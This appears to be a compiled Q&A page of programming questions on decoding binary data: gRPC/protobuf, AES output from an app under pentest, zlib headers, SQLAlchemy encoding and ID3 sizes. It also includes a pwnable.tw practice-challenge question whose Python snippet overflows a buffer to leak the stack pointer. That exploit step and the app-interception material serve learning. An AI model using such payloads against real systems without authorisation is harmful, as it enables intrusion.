Deserializing gRPC message - python

Problem
I intercepted a gRPC network request from an application, and I intend to modify the contents and resend the message programmatically. As no tools (except for MitmProxy, see below) were able to decode the protobuf data I wanted to know why that is.
The gRPC payload sent from the client:
gRPC header | Protobuf data
[00] [00 00 00 22] [12 12 09 c3 8d 09 16 c3 93 2a c2 a5 4d 40 11 14 39 c3 ab 6b c2 a2 c3 b3 31 40 1a 05 65 6e 2d 53 45 1a 05 73 76 2d 53 45]
^^ ^^ Payload length
Compressed flag
What I've tried
Failure
protoc --decode_raw on the protobuf data, but I get Failed to parse input.
CyberChef with protobuf decode, gives Error: Exhausted Buffer
The blackboxprotobuf python module, raising google.protobuf.message.DecodeError: Invalid Message Length
Success
MitmProxy was able to decode the data to the following:
gRPC message 0 (compressed False)
[message] 2
[fixed64] 2.1 4633543028839346763
[fixed64] 2.2 4625748902140211098
[message] 3
[fixed32] 3.12 1163079022
[string] 3 sv-SE
Manually decoding
[message]
00010 010 00010010
2 LEN 18
[fixed64]
00001 001 [11000011 10001101 00001001 00010110 11000011 10010011 00101010 11000010]
1 I64 13991157658477498000
[fixed32]
10100 101 [01001101 01000000 00010001 00010100]
20 I32 336674893
[fixed64]
00111 001 [11000011 10101011 01101011 11000010 10100010 11000011 10110011 00110001]
7 I64 3581421232503631000
[unknown]
01000 000 [00011010 00000101]
8 VARINT ???
[message]
00011 010 00000101
3 LEN 5
[fixed32]
01100 101 [01101110 00101101 01010011 01000101]
12 I32 1163079022
[string]
00011 010 00000101 [01110011 01110110 00101101 01010011 01000101]
3 LEN 7 s v - S E
I decoded it using the google documentation as reference: https://developers.google.com/protocol-buffers/docs/encoding. However, I am not familiar with gRPC or protobuf so I have likely have gaps in my knowledge.
Worth noting:
I was able to successfully decode all server responses without problems.
The payload length as indicated by the gRPC header (0x22) differs from its actual length (0x28).
MitmProxy has access to both the gRPC headers and the protobuf data, while the other tools I tried (that all failed) only support protobuf data as input.
I do not know for a fact that MitmProxy decoded the data correctly, only that it ran without exceptions
According to the user agent, the client uses grpc-swift-nio/1.9.0

Related

Python Crypto AES 128 with PKCS7Padding different outputs from Swift vs Python

The output produced by crypto with following key
key = base64.b64decode('PyxZO31GlgKvWm+3GLySzAAAAAAAAAAAAAAAAAAAAAA=') (16 bytes)
and the
message = "y_device=y_C9DB602E-0EB7-4FF4-831E-8DA8CEE0BBF5"
My IV object looks like this:
iv = base64.b64decode('AAAAAAAAAAAAAAAAAAAAAA==')
Objective C CCCrypt produces the following hash 4Mmg/BPgc2jDrGL+XRA3S1d8vm02LqTaibMewJ+9LLuE3mV92HjMvVs/OneUCLD4
It appears to be using AlgorithmAES128 uses PKCS7Padding with the key provided above.
I'm trying to implement the same crypto encode functionality to get an output like 4Mmg/BPgc2jDrGL+XRA3S1d8vm02LqTaibMewJ+9LLuE3mV92HjMvVs/OneUCLD4
This is what I've been able to put so far
from Crypto.Util.Padding import pad, unpad
from Crypto . Cipher import AES
class MyCrypt():
def __init__(self, key, iv):
self.key = key
self.iv = iv
self.mode = AES.MODE_CBC
def encrypt(self, text):
cryptor = AES.new(self.key, self.mode, self.iv)
length = 16
text = pad(text, 16)
self.ciphertext = cryptor.encrypt(text)
return self.ciphertext
key = base64.b64decode('PyxZO31GlgKvWm+3GLySzAAAAAAAAAAAAAAAAAAAAAA=')
IV = base64.b64decode('AAAAAAAAAAAAAAAAAAAAAA==')
plainText = 'y_device=y_C9DB602E-0EB7-4FF4-831E-8DA8CEE0BBF5'.encode('utf-8')
crypto = MyCrypt(key, IV)
encrypt_data = crypto.encrypt(plainText)
encoder = base64.b64encode(encrypt_data)
print(encrypt_data, encoder)
This produces the following output Pi3yzpoVhax0Cul1VkYoyYCivZrEliTDBpDbqZ3dD1bwTUycstAF+MLSTIjSMiQj instead of 4Mmg/BPgc2jDrGL+XRA3S1d8vm02LqTaibMewJ+9LLuE3mV92HjMvVs/OneUCLD4
`
Which isn't my desired output.
should I not be using MODE_ECB, or am I using key as intended ?
To add more context
I'm naive to Crypto/ Objective C.
I'm currently pentesting an app, which does some hashing behind the scenes.
Using frida I'm tracing these function calls, and I see the following get populated for swift Objc calls.
CCCrypt(operation: 0x0, CCAlgorithm: 0x0, CCOptions: 0x1, keyBytes: 0x1051f8639, keyLength: 0x10, ivBuffer: 0x1051f8649, inBuffer: 0x2814bd890, inLength: 0x58, outBuffer: 0x16f1c5d90, outLength: 0x60, outCountPtr: 0x16f1c5e10)
Where
CCCrypt(operation: 0x0, CCAlgorithm: 0x0, CCOptions: 0x1, keyBytes: 0x1051f8639, keyLength: 0x10, ivBuffer: 0x1051f8649, inBuffer: 0x280e41530, inLength: 0x2f, outBuffer: 0x16f1c56c0, outLength: 0x30, outCountPtr: 0x16f1c5710)
In buffer:
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
280e41530 79 5f 64 65 76 69 63 65 3d 79 5f 43 39 44 42 36 y_device=y_C9DB6
280e41540 30 32 45 2d 30 45 42 37 2d 34 46 46 34 2d 38 33 02E-0EB7-4FF4-83
280e41550 31 45 2d 38 44 41 38 43 45 45 30 42 42 46 35 1E-8DA8CEE0BBF5
Key: 16 47
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
1051f8639 3f 2c 59 3b 7d 46 96 02 af 5a 6f b7 18 bc 92 cc ?,Y;}F...Zo.....
IV: 16
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
1051f8649 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
I use https://opensource.apple.com/source/CommonCrypto/CommonCrypto-36064/CommonCrypto/CommonCryptor.h to reference the type of encryption happening based on pointers i.e for Options argument the following is passed 0x1
key = base64.b64decode('PyxZO31GlgKvWm+3GLySzAAAAAAAAAAAAAAAAAAAAAA=') (16 bytes)
Nope, that's 32 bytes. It's true that only 16 are non-zero, making a really poor key, but if you pass 256 bits, you are doing AES-256, and you'll get a different result than you would from AES-128 using the first 128 bits of that key.
Your title mentions PKCS #7 padding, but it looks like your code is padding with zeros. That will change the results as well.
ECB doesn't use an IV. If you can see that the Swift code is using the IV, you might be able to see what mode it's using too, or you could try CBC as a first guess. ECB is insecure in most cases. Of course, using a fixed IV is also insecure.
Your output is longer than it should be (64 bytes instead of 48). Your attempt to do the padding yourself is probably responsible for this.
From <CommonCryptor.h>, we can decode the parameters used in Swift's call to CCCrypt:
Type
Value
Name
Comment
CCOperation
0x0
kCCEncrypt
Symmetric encryption.
CCAlgorithm
0x0
kCCAlgorithmAES128
Advanced Encryption Standard, 128-bit block
CCOptions
0x1
kCCOptionPKCS7Padding
Perform PKCS7 padding.
CCOptions
0x2
kCCOptionECBMode
Electronic Code Book Mode. Default is CBC.
CCOptions is a bit field, and kCCOptionECBMode is not set, so the default is used.
So this is AES-128 in CBC mode with PKCS #7 padding.

How to keep the header and trailer while zlib decompress and compress

I have raw data extracted from PDF and I decompressed the raw data and compressed it again.
I expected the same header and trailer, but the header was changed.
Original Hex Header
48 89 EC 57 ....
Converted Hex Header
78 9C EC BD ...
I dug into zlib compression and got header 48 also is one of zlib.header.
But mostly 78 is used for zlib compression.
It's my code which decompress and compress:
decompress_wbit = 12
compress_variable = 6
output_data = zlib.decompress(open(raw_data, "rb").read(), decompress_wbit)
output_data = zlib.compress(output_data, 6)
output_file = open(raw_data + '_', "wb")
output_file.write(output_data)
output_file.close()
I changed the decompress_wbit and compress_variable but still keeps 78.
So not sure how to get 48 as header.
Here is the short description about zlib.header.
CINFO (bits 12-15)
Indicates the window size as a power of two, from 0 (256 bytes) to 7 (32768 bytes). This will usually be 7. Higher values are not allowed.
CM (bits 8-11)
The compression method. Only Deflate (8) is allowed.
FLEVEL (bits 6-7)
Roughly indicates the compression level, from 0 (fast/low) to 3 (slow/high)
FDICT (bit 5)
Indicates whether a preset dictionary is used. This is usually 0. 1 is technically allowed, but I don't know of any Deflate formats that define preset dictionaries.
FCHECK (bits 0-4)
A checksum (5 bits, 0..31), whose value is calculated such that the entire value divides 31 with no remainder.
Typically, only the CINFO and FLEVEL fields can be freely changed, and FCHECK must be calculated based on the final value.* Assuming no preset dictionary, there is no choice in what the other fields contain, so a total of 32 possible headers are valid. Here they are:
FLEVEL: 0 1 2 3
CINFO:
0 08 1D 08 5B 08 99 08 D7
1 18 19 18 57 18 95 18 D3
2 28 15 28 53 28 91 28 CF
3 38 11 38 4F 38 8D 38 CB
4 48 0D 48 4B 48 89 48 C7
5 58 09 58 47 58 85 58 C3
6 68 05 68 43 68 81 68 DE
7 78 01 78 5E 78 9C 78 DA
Please let me know how to keep the zlib.header while decompression & compression
Thanks for your time.
I will first note that it doesn't matter. The data will be decompressed fine with that zlib header. Why do you care?
You are giving zlib.compress a small amount of data that permits a smaller window. Since it is permitted, the Python library is electing to compress with a smaller window.
A way to avoid that would be to use zlib.compressobj instead. Upon initiation, it doesn't know how much data you will be feeding it and will default to the largest window size.

Exploiting system calls in assembly

I'm attempting to solve pwnable.tw's start challenge to learn a bit more about exploits. The provided dissassembled binary looks like this:
start: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 54 push esp
8048061: 68 9d 80 04 08 push 0x804809d
8048066: 31 c0 xor eax,eax
8048068: 31 db xor ebx,ebx
804806a: 31 c9 xor ecx,ecx
804806c: 31 d2 xor edx,edx
804806e: 68 43 54 46 3a push 0x3a465443
8048073: 68 74 68 65 20 push 0x20656874
8048078: 68 61 72 74 20 push 0x20747261
804807d: 68 73 20 73 74 push 0x74732073
8048082: 68 4c 65 74 27 push 0x2774654c
8048087: 89 e1 mov ecx,esp ; buffer = $esp
8048089: b2 14 mov dl,0x14 ; count = 0x14 (20)
804808b: b3 01 mov bl,0x1 ; fd = 1 (stdout)
804808d: b0 04 mov al,0x4 ; system call = 4 (sys_write)
804808f: cd 80 int 0x80 ; call sys_write(1, $esp, 20)
8048091: 31 db xor ebx,ebx ; fd = 0 (stdin)
8048093: b2 3c mov dl,0x3c ; count = 0x36 (60)
8048095: b0 03 mov al,0x3 ; system call = 3 (sys_read)
8048097: cd 80 int 0x80 ; sys_read(0, ecx/$esp, 60)
8048099: 83 c4 14 add esp,0x14
804809c: c3 ret
0804809d <_exit>:
804809d: 5c pop esp
804809e: 31 c0 xor eax,eax
80480a0: 40 inc eax
Several writeups (1, 2, and 3) point out that the solution lies in leaking the esp address that was moved into ecx by exploiting the count values on sys_write and sys_read. This way, we can force the return address to 0x8048087 so that the program will loop and print the content of esp.
However, I do not understand how this really works. What exactly do the system calls do to registers and how does that change the return address? Why does the below exploit work?
from socket import *
from struct import *
c = socket(AF_INET, SOCK_STREAM)
c.connect(('chall.pwnable.tw', 10000))
# leak esp
c.send('x' * 20 + pack('<I', 0x08048087))
esp = unpack('<I', c.recv(0x100)[:4])[0]
print 'esp = {0:08x}'.format(esp)
I believe a step-by-step walkthrough that displays per-step register values could really help clarify the problem.

SQLAlchemy Unicode conundrum

I'm having a weird problem regarding Unicode handling with SQLAlchemy.
In short, when I insert a Python unicode string into an Unicode column
of my MySQL database, I have no trouble getting it back out. On the database
side, however, it gets stored as a weird 4-byte sequence (and no, this
doesn't seem to have anything to do with the 'utf8mb4' default on
MySQL)
My problem is that I have a MySQL dump from another machine that
contains straight UTF8 characters in the SQL. When I try to retrieve
data imported from that other machine I get UnicodeDecodeErrors all the
time.
Below I've included a minimal example that illustrates the problem.
utf8test.sql: Set up a database and create one row with a Unicode
character in it
utf8test.py: Open DB using SQLAlchemy, insert 1 row with
Python's idea of an UTF character, and retrieve both rows.
It turns out that Python can retrieve the data it inserted itself fine,
but it balks at the literal 'ä' I put into the SQL import script.
Investigation of the hexdumps of both an mysqldumped dataset
and the binary data files of MySQL itself shows that the UTF character
inserted via SQL is the real deal (German umlaut 'ä' = UTF 'c3 bc'),
whereas the Python-inserted 'ä' gets converted to the sequence
'c3 83 c2 a4' which I don't understand (see hexdump down below;
I've used 'xxx' and 'yyy' as markers to faciliate finding them
in the hexdump).
Can anybody shed any light on this?
This creates the test DB:
dh#jenna:~/python$ cat utf8test.sql
DROP DATABASE IF EXISTS utftest;
CREATE DATABASE utftest;
USE utftest;
CREATE TABLE x (
id INTEGER PRIMARY KEY AUTO_INCREMENT,
text VARCHAR(10)
);
INSERT INTO x(text) VALUES ('xxxü');
COMMIT;
dh#jenna:~/python$ mysql < utf8test.sql
Here's the Pyhton script:
dh#jenna:~/python$ cat utf8test.py
# -*- encoding: utf8 -*-
from sqlalchemy import create_engine, Column, Unicode, Integer
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class X(Base):
__tablename__ = 'x'
id = Column(Integer, primary_key=True)
text = Column(Unicode(10))
engine = create_engine('mysql://localhost/utftest',
encoding='utf8')
Base.metadata.create_all(engine)
Session = sessionmaker(engine)
db = Session()
x = X(text=u'yyyä')
db.add(x)
db.commit()
rs = db.query(X.text).all()
for r in rs:
print(r.text)
db.close()
This happens when I run the script (runs without error when I
omit the INSERT INTO bit in utf8test.sql):
dh#jenna:~/python$ python utf8test.py
Traceback (most recent call last):
File "utf8test.py", line 23, in <module>
rs = db.query(X.text).all()
[...]
UnicodeDecodeError: 'utf8' codec can't decode
byte 0xfc in position 3: invalid start byte
Here's a hexdump to confirm that the two ä's are indeed stored
differently in the DB. Using hd I've also conformed that both the
Python as well as the SQL scripts are indeed UTF.
dh#jenna:~/python$ mysqldump utftest | hd
00000000 2d 2d 20 4d 79 53 51 4c 20 64 75 6d 70 20 31 30 |-- MySQL dump 10|
00000010 2e 31 36 20 20 44 69 73 74 72 69 62 20 31 30 2e |.16 Distrib 10.|
00000020 31 2e 33 37 2d 4d 61 72 69 61 44 42 2c 20 66 6f |1.37-MariaDB, fo|
00000030 72 20 64 65 62 69 61 6e 2d 6c 69 6e 75 78 2d 67 |r debian-linux-g|
00000040 6e 75 20 28 69 36 38 36 29 0a 2d 2d 0a 2d 2d 20 |nu (i686).--.-- |
[...]
00000520 4c 45 20 4b 45 59 53 20 2a 2f 3b 0a 49 4e 53 45 |LE KEYS */;.INSE|
00000530 52 54 20 49 4e 54 4f 20 60 78 60 20 56 41 4c 55 |RT INTO `x` VALU|
00000540 45 53 20 28 31 2c 27 78 78 78 c3 bc 27 29 2c 28 |ES (1,'xxx..'),(|
00000550 32 2c 27 79 79 79 c3 83 c2 a4 27 29 3b 0a 2f 2a |2,'yyy....');./*|
c3 83 c2 a4 is the "double encoding" for ä. as Ilja points out. It is discussed further here
http://mysql.rjweb.org/doc.php/charcoll#fixes_for_various_cases provides an UPDATE to fix the data.
Here is a checklist of things that may need to be fixed in your Python: http://mysql.rjweb.org/doc.php/charcoll#python
But this is scary: I see c3 bc (Mojibake for ü) and c3 83 c2 a4 (double-encoding of ä. This implies that you have two different problems happening in the same code. Back up to ground zero, make sure you are using utf8 (or utf8mb4) at all stages of things. Your database may be too messed up to recover from, so consider starting over.
Possibly the only issue is the absence of # -*- encoding: utf8 -*- from one of the python scripts. But, no. You do need that, yet the double-encoding occurred when you used it.
Bottom line: You have multiple errors.
Adding ?use_utf8=0 to the DB URL solves the problem. Found that in the SQLAlchemy docs.

How to unpack ID3 header's size

I am trying to unpack the ID3v2.3 header with Python 2.7. However, I do not fully understand the first 10 bytes of the MP3 format. For example:
49 44 33 03 00 00 | 00 00 21 76 | 54 41 4C 42
.I .D .3 .3 .0 | RawSize | Size
Using Synalyze it! I can see that RawSize is 0x2176 and Size is 4342.
At offset 4352 is where the MPEG data frames begin. I need to know how
54 41 4C 42 gets converted to 4342 because when I tried:
>>> unpack('i', '\x54\x41\x4C\x42')
(1112293716,)
which does not look in anyways like 4352!
How should I read them in general?
Firstly, you give 14 bytes there, not 10.
Secondly, you've botched reading the size completely. The size uses unpacked 7-bit values rather than 8-bit values.
>>> 0x00 << 21 | 0x00 << 14 | 0x21 << 7 | 0x76
4342

Categories

Resources